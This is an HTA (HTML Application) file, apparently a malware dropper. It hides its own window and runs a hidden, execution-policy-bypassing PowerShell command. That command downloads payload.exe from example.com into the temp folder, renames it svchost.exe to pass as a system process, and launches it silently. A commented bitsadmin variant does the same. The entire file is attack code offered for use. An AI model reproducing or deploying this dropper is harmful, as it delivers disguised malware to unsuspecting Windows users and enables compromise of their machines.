<hta:application
  id="oHTA"
  applicationname="SystemHelper"
  border="none"
  caption="no"
  showintaskbar="no"
  windowstate="minimize"
  singleinstance="yes"
  navigable="no"
  sysmenu="no"
  contextmenu="no"
  innerborder="no"
  scroll="no"
/>

<script language="VBScript">
  ' Immediately hide window before anything renders
  Window.resizeTo 0,0
  Window.moveTo -2000,-2000
  Set objShell = CreateObject("WScript.Shell")
  
  ' Method 1: Direct silent execution (best)
  objShell.Run "cmd /q /c start /b powershell -WindowStyle Hidden -Exec Bypass -C ""$p=$env:temp+'\svchost.exe';iwr 'https://example.com/payload.exe' -out $p;Start-Process -WindowStyle Hidden $p""", 0, False
  
  ' Method 2: Alternative using bitsadmin (no PowerShell)
  ' objShell.Run "cmd /q /c bitsadmin /transfer payload /download /priority high https://example.com/payload.exe %temp%\svchost.exe & start /b %temp%\svchost.exe", 0, False
  
  ' Force close HTA immediately
  window.setTimeout "Self.Close()", 100
</script>
